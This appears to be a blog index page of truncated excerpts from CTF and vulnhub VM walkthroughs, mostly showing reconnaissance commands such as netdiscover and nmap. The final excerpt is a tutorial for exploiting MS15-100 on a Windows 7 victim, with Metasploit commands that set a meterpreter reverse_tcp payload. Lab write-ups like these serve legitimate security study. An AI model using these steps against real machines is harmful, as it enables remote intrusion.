Hack the Fartknocker VM (CTF Challenge)

Top HatSec built a VM image “Fart knocker” and kept the challenge to capture the flag in his machine. This VM box is mainly design for testing your network penetration skills, before solving this challenge you must know about network packet analysis and port knocking. Let’s begin! Scan your network using netdiscover command I found an IP […]

Hack the Simple VM (CTF Challenge)

Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks […]

Hack the Pluck VM (CTF Challenge)

Coming towards another tutorial of vulnhub’s lab challenges “pluck” you can download it from here.This lab is quite simple this article may help you to solve the task for capturing the flag.LET’S START!!!192.168.1.115 is my target IP let enumerate through aggressive scan using NMAP. You can observe its result from given screenshot.nmap -p- -A 192.168.1.115Use […]

Hack the Lord of the Root VM (CTF Challenge)

This is another Boot2Root challenge which has been prepared by KoocSec for hacking exercises. He prepared this through the inspiration of his OSCP exam. It is based on the concepts of great novel-turned-movie The Lord Of The Ring. You can download this VM from –> https://www.vulnhub.com/entry/lord-of-the-root-101,129/ WalkThroughFirstly, we will find our target.netdiscoverOur target is 192.168.1.5Now […]

Hack the Minotaur VM (CTF Challenge)

Minotaur is a Boot2Root CTF challenge which helps us improve our skills especially of password cracking. The VM will assign itself a specific IP address (in the 192.168.56.0/24 range). Do not change this, as the CTF will not work properly without an IP address of 192.168.56. We know to think about it i.e.: One password […]

Hack the Pipe VM (CTF Challenge)

PIPE is another CTF which gives you a platform to enhance your penetration testing skills. So let’s not waste any more time and get started with it.First of all download pipe lab from hereLike always our first step would be to run netdiscover command to see the active hosts in our network.netdiscover Target IP: 192.168.0.103As […]

Hack the SkyDog Con CTF 2016 – Catch Me If You Can VM

SkyDog is the second VM in CTF Root2Boot series created by James Brower. It is configured with DHCP so the IP will be given to it automatically. This VM is based on Catch me if you can which is movie about Frank who is conman. So it is correct to assume that a broad OSINT […]

Hack the SkyDog VM (CTF Challenge)

SkyDog is a Capture the Flag VM with six flags. Capturing these flags is quite fun and interesting. Before starting off i am listing the following hints that we know of beforehand: Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words) Flag #2 When do Androids Learn to Walk? Flag #3 […]

Hack the Gibson VM (CTF Challenge)

It’s a boot2root challenge and it does not get over with getting root access. You have to find flag also. So let’s start.First of all download lab from https://download.vulnhub.com/gibson/gibson.ovaNow open kali terminal and like always start with first step i.e. netdiscovernetdiscoverit shows all the hosts those are up in our network and from here we […]

Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

This module exploits vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution. Exploit Targets Windows 7 Requirement Attacker: kali Linux Victim PC: Windows 7 Open Kali terminal type msfconsole Now type use exploit/windows/fileformat/ms15_100_mclexemsf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcpmsf exploit (ms15_100_mclexe)>set […]